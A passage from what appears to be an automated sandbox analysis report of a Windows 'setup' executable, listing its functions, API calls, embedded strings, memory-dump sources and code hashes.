                                                                                                                          • RegDeleteKeyW.ADVAPI32(00000000,?), ref: 00C3B188
                                                                                                                          • RegDeleteValueW.ADVAPI32(00000000,?,?,00000000), ref: 00C3B1A8
                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00C3B1D9
                                                                                                                            • Part of subcall function 00C3AB85: RegCloseKey.ADVAPI32(00000000), ref: 00C3AC2A
                                                                                                                            • Part of subcall function 00C3AB85: RegCloseKey.ADVAPI32(00000000), ref: 00C3AC39
                                                                                                                          • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000001,?,00000000,?,00000000), ref: 00C3B1D0
                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00C3B1F4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Close$DeleteValue$PrivateProfileStringWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 222425065-0
                                                                                                                          • Opcode ID: 1c4edbb7ad96c0b76ec4b58b2fe16d907072ceb3670a671121b8fa094c2a0c08
                                                                                                                          • Instruction ID: cf499593f4970fb0742b87f62de52c0683f97fe9a58ceeba7c08a5193eb305a1
                                                                                                                          • Opcode Fuzzy Hash: 1c4edbb7ad96c0b76ec4b58b2fe16d907072ceb3670a671121b8fa094c2a0c08
                                                                                                                          • Instruction Fuzzy Hash: E411AC33520616BBCB225F619C98FAF7B6AAF487A0F114025FA169A160DB31CE10D7E0
                                                                                                                          Function 00C12586 Relevance: 7.6, APIs: 5, Instructions: 60fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C1258D
                                                                                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C125B6
                                                                                                                          • DragQueryFileW.SHELL32(?,00000000,00000000,00000000), ref: 00C125C2
                                                                                                                          • DragQueryFileW.SHELL32(?,00000000,00000000,00000004), ref: 00C125E0
                                                                                                                          • DragFinish.SHELL32(?), ref: 00C125F4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Drag$FileQuery$FinishH_prolog3
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 624144372-0
                                                                                                                          • Opcode ID: 542427611f2aa29ac1146fbbf24749b76fb6a4de491e64d1a3c2a8858cf83a00
                                                                                                                          • Instruction ID: 5964b806548031ea31153cb2397a5c34b78957c64cf9dd961b9744697a457618
                                                                                                                          • Opcode Fuzzy Hash: 542427611f2aa29ac1146fbbf24749b76fb6a4de491e64d1a3c2a8858cf83a00
                                                                                                                          • Instruction Fuzzy Hash: 3311A0B1800116AFEB18ABA4DD59EBF77ACFF45310B054629B812A71C1DE70AE04EB60
                                                                                                                          Function 00C121BB Relevance: 7.6, APIs: 5, Instructions: 59threadwindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C121C2
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00C121F5
                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 00C12243
                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?), ref: 00C12260
                                                                                                                          • PostMessageW.USER32(00000000,00000000,00000000), ref: 00C12276
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$CurrentEnterH_prolog3LeaveMessagePostThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 73856410-0
                                                                                                                          • Opcode ID: 4b15f5545374f049b180bef19a72d64f1930037b2d7b5072676961491c3f8720
                                                                                                                          • Instruction ID: 0bfa19d5997fa8ce515ee58f265c9b7d63d5d10f9c55956aedda4788e60817c2
                                                                                                                          • Opcode Fuzzy Hash: 4b15f5545374f049b180bef19a72d64f1930037b2d7b5072676961491c3f8720
                                                                                                                          • Instruction Fuzzy Hash: 1B219A74900206FBDF159F60CC49BEDBBB0FB16314F04411AF5195A2A1CB749AA5EB91
                                                                                                                          Function 00C230FA Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003), ref: 00C23153
                                                                                                                          • VerSetConditionMask.KERNEL32(00000000,?,00000001,00000003), ref: 00C2315B
                                                                                                                          • VerSetConditionMask.KERNEL32(00000000,?,00000020,00000003), ref: 00C23163
                                                                                                                          • VerSetConditionMask.KERNEL32(00000000,?,00000010,00000003), ref: 00C2316B
                                                                                                                          • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 00C23176
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ConditionMask$InfoVerifyVersion
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2793162063-0
                                                                                                                          • Opcode ID: a8cf220b814c66bd4841fe9ac139a0d8c40ae62716a177096facf478d42a4413
                                                                                                                          • Instruction ID: 19d453b3f5eb8889cb162c461b3f531db2dfd6f754ff05a0885abc18bb677981
                                                                                                                          • Opcode Fuzzy Hash: a8cf220b814c66bd4841fe9ac139a0d8c40ae62716a177096facf478d42a4413
                                                                                                                          • Instruction Fuzzy Hash: 600179B09543147AE6309B74EC4AFAB7ADCDB88B10F00491AB648D71C0D6B495148BE5
                                                                                                                          Function 00C10561 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • DestroyCaret.USER32 ref: 00C10574
                                                                                                                          • GetObjectW.GDI32(?,0000005C,?), ref: 00C10596
                                                                                                                          • CreateCaret.USER32(?,00000000,00000001,00000002), ref: 00C105CB
                                                                                                                          • ShowCaret.USER32(?), ref: 00C105D4
                                                                                                                          • HideCaret.USER32(?), ref: 00C105DF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Caret$CreateDestroyHideObjectShow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4023528183-0
                                                                                                                          • Opcode ID: a73f0ce482d8b85d9284502c0c60b1ac88c3b28365e6ff45db20952c4755b789
                                                                                                                          • Instruction ID: 06da33b483e0eaaaa65287547861f531caf2aeaa673a3f5b3d5e99d736c8118c
                                                                                                                          • Opcode Fuzzy Hash: a73f0ce482d8b85d9284502c0c60b1ac88c3b28365e6ff45db20952c4755b789
                                                                                                                          • Instruction Fuzzy Hash: 46016131600709AFDB25AB74DC0DFAEB7B6BB08700F114529F5469A1E0EBB1A944DF44
                                                                                                                          Function 00C2C8AF Relevance: 7.5, APIs: 5, Instructions: 40fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • DeleteFileW.KERNEL32(00000000,?,00C23EDC,?,?,*.*,00004014,?,?,4641B5ED,?,?,00000000,00C93FF6,000000FF), ref: 00C2C8C5
                                                                                                                          • GetLastError.KERNEL32(?,00C23EDC,?,?,*.*,00004014,?,?,4641B5ED,?,?,00000000,00C93FF6,000000FF,?,00C165B2), ref: 00C2C8CF
                                                                                                                          • GetFileAttributesW.KERNEL32(00000000,?,00C23EDC,?,?,*.*,00004014,?,?,4641B5ED,?,?,00000000,00C93FF6,000000FF), ref: 00C2C8E2
                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000000,?,00C23EDC,?,?,*.*,00004014,?,?,4641B5ED,?,?,00000000,00C93FF6,000000FF), ref: 00C2C8F9
                                                                                                                          • DeleteFileW.KERNEL32(00000000,?,00C23EDC,?,?,*.*,00004014,?,?,4641B5ED,?,?,00000000,00C93FF6,000000FF), ref: 00C2C90B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AttributesDelete$ErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 790777564-0
                                                                                                                          • Opcode ID: 6570e03446f78060120cb34fde9fb386e7130ab12d059e34587ac6395373d028
                                                                                                                          • Instruction ID: bc8a454a209cbdcb934d01e35cf11acb4ebdab8a795736a72ef37322da0c255d
                                                                                                                          • Opcode Fuzzy Hash: 6570e03446f78060120cb34fde9fb386e7130ab12d059e34587ac6395373d028
                                                                                                                          • Instruction Fuzzy Hash: ABF03070600972A38A2437797D8E7AE375D5E223A13150615F036E38E1CFA4CAC5A668
                                                                                                                          Function 00C3F2B5 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 37COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • EnterCriticalSection.KERNEL32(00CC3BA0,?,MultiDataViewCtrl,?,?,00C2F254,00000001), ref: 00C3F2E6
                                                                                                                          • InitializeCriticalSection.KERNEL32(00000000,?,00C2F254,00000001), ref: 00C3F2FC
                                                                                                                          • LeaveCriticalSection.KERNEL32(00CC3BA0,?,00C2F254,00000001), ref: 00C3F30A
                                                                                                                          • EnterCriticalSection.KERNEL32(00000000,MultiDataViewCtrl,?,?,00C2F254,00000001), ref: 00C3F317
                                                                                                                            • Part of subcall function 00C3F24C: InitializeCriticalSection.KERNEL32(00CC3BA0,00C3F2CF,?,?,00C2F254,00000001), ref: 00C3F264
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$EnterInitialize$Leave
                                                                                                                          • String ID: MultiDataViewCtrl
                                                                                                                          • API String ID: 713024617-1429961936
                                                                                                                          • Opcode ID: 8ea471ad643c97af660477080698b10cf11dafdbce817c767d86e95152410654
                                                                                                                          • Instruction ID: 43bd41049e1c76a791271ef81ed95a888d246979dfc0fb4997867aa97f6f6ec0
                                                                                                                          • Opcode Fuzzy Hash: 8ea471ad643c97af660477080698b10cf11dafdbce817c767d86e95152410654
                                                                                                                          • Instruction Fuzzy Hash: ADF06272900158ABCB403B98FC5CF7D776CFB52325F44447EE446D2162C735CE4689A5
                                                                                                                          Function 00C17E81 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 216COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _strlen.LIBCMT ref: 00C17ECA
                                                                                                                            • Part of subcall function 00C2C8AF: DeleteFileW.KERNEL32(00000000,?,00C23EDC,?,?,*.*,00004014,?,?,4641B5ED,?,?,00000000,00C93FF6,000000FF), ref: 00C2C8C5
                                                                                                                            • Part of subcall function 00C2C8AF: GetLastError.KERNEL32(?,00C23EDC,?,?,*.*,00004014,?,?,4641B5ED,?,?,00000000,00C93FF6,000000FF,?,00C165B2), ref: 00C2C8CF
                                                                                                                            • Part of subcall function 00C2C8AF: GetFileAttributesW.KERNEL32(00000000,?,00C23EDC,?,?,*.*,00004014,?,?,4641B5ED,?,?,00000000,00C93FF6,000000FF), ref: 00C2C8E2
                                                                                                                            • Part of subcall function 00C2C8AF: SetFileAttributesW.KERNEL32(00000000,00000000,?,00C23EDC,?,?,*.*,00004014,?,?,4641B5ED,?,?,00000000,00C93FF6,000000FF), ref: 00C2C8F9
                                                                                                                            • Part of subcall function 00C2C8AF: DeleteFileW.KERNEL32(00000000,?,00C23EDC,?,?,*.*,00004014,?,?,4641B5ED,?,?,00000000,00C93FF6,000000FF), ref: 00C2C90B
                                                                                                                          Strings
                                                                                                                          • Deleting file : "%s", xrefs: 00C1806F
                                                                                                                          • FAILED to deleting file : "%s", xrefs: 00C1807F
                                                                                                                          • Deleting all files matching : "%s", xrefs: 00C17FF2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AttributesDelete$ErrorLast_strlen
                                                                                                                          • String ID: Deleting all files matching : "%s"$Deleting file : "%s"$FAILED to deleting file : "%s"
                                                                                                                          • API String ID: 3775870863-2364433603
                                                                                                                          • Opcode ID: bd29872e230896086ea8a1daa5534282fe2ba675b81eb5d472745c22e4deb49f
                                                                                                                          • Instruction ID: 7e83f01e160c2e46d8f646de77b5204d2b4a31a6944b01b6877bbdfba73587a4
                                                                                                                          • Opcode Fuzzy Hash: bd29872e230896086ea8a1daa5534282fe2ba675b81eb5d472745c22e4deb49f
                                                                                                                          • Instruction Fuzzy Hash: 06817B31904268EEDB20EBA4CC56AEEB7B8FF15710F10416AF415B7091DB306F89EB91
                                                                                                                          Function 00C22AB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 207COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C22AB7
                                                                                                                          • RedrawWindow.USER32(?,00000000,00000000,00000105,00000000,00000000,00000000,00000000,00000000,00000037,Browse for File,00000000), ref: 00C22D58
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: H_prolog3RedrawWindow
                                                                                                                          • String ID: All Files (*.*)|*.*||$Browse for File
                                                                                                                          • API String ID: 474685049-4137175618
                                                                                                                          • Opcode ID: 327b7d3d4bad744f529f61a5c6aa9d02603a10c9d840159c9a5af2beedf3010c
                                                                                                                          • Instruction ID: 8b85108a009383560044fcc30540fb9a2e5e0ddf6626111405c0c55cf5847815
                                                                                                                          • Opcode Fuzzy Hash: 327b7d3d4bad744f529f61a5c6aa9d02603a10c9d840159c9a5af2beedf3010c
                                                                                                                          • Instruction Fuzzy Hash: A0819070711612FFEB18DF24D885FA9FBA5BF04300F04426DE8299B6A1DB70AE14DB90
                                                                                                                          Function 00C02520 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 173COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C0252A
                                                                                                                            • Part of subcall function 00C038F1: _Deallocate.LIBCONCRT ref: 00C03906
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DeallocateH_prolog3_
                                                                                                                          • String ID: Content-Length$Content-Type$Filename
                                                                                                                          • API String ID: 289593924-2927965255
                                                                                                                          • Opcode ID: ab767a0f1301b5b6348944db123433fb299c6bca1b3996f1b3e6fb692f0d8197
                                                                                                                          • Instruction ID: 881f2d3db4d81b2306f7021a44cfb34d9eeb4177abec6be391b8e08b2b1f230d
                                                                                                                          • Opcode Fuzzy Hash: ab767a0f1301b5b6348944db123433fb299c6bca1b3996f1b3e6fb692f0d8197
                                                                                                                          • Instruction Fuzzy Hash: 5D613D71E003199FDF14DFA8C899ADDB7B5BF48300F24816AE419EB295EB309A45DF50
                                                                                                                          Function 00C63CF0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 153COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ://$:/?_.#&;=$file
                                                                                                                          • API String ID: 0-1271483328
                                                                                                                          • Opcode ID: 38e232bf29cfeffbf1ac2ddb4b615bf36f9bcaff2e79537dcfc89cf09c834cc3
                                                                                                                          • Instruction ID: 768730be2f7f263f65e1390cf8b19ed645c230f6ba5d810795b23bbb806de214
                                                                                                                          • Opcode Fuzzy Hash: 38e232bf29cfeffbf1ac2ddb4b615bf36f9bcaff2e79537dcfc89cf09c834cc3
                                                                                                                          • Instruction Fuzzy Hash: D8417E75E101C11BEB312968ACC276B77DA8F92765F580079E85885203E7299B9393F3
                                                                                                                          Function 00C23E62 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 00C23EEC
                                                                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 00C23F7A
                                                                                                                            • Part of subcall function 00C2C0B0: FindClose.KERNEL32(?,?,?,00C23F10), ref: 00C2C0E9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DirectoryRemove$CloseFind
                                                                                                                          • String ID: *.*$x
                                                                                                                          • API String ID: 2984516050-2538783531
                                                                                                                          • Opcode ID: 6404b25d124210601510b3c557a666194621fd6bfafd6c8110fbce963e6d27f8
                                                                                                                          • Instruction ID: 27a0e773f70e08af7473a2c99ca356023466d57706d8af025f84005a7df927f4
                                                                                                                          • Opcode Fuzzy Hash: 6404b25d124210601510b3c557a666194621fd6bfafd6c8110fbce963e6d27f8
                                                                                                                          • Instruction Fuzzy Hash: 4531A8719002689ADB24EB54EC8AFEEB3BCEF10710F5006B5F515E2491EF35AF85DA50
                                                                                                                          Function 00C26AB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _strlen.LIBCMT ref: 00C26AE9
                                                                                                                          • lstrlenA.KERNEL32(00000000,?,?,?,00000000), ref: 00C26B55
                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000), ref: 00C26B6C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
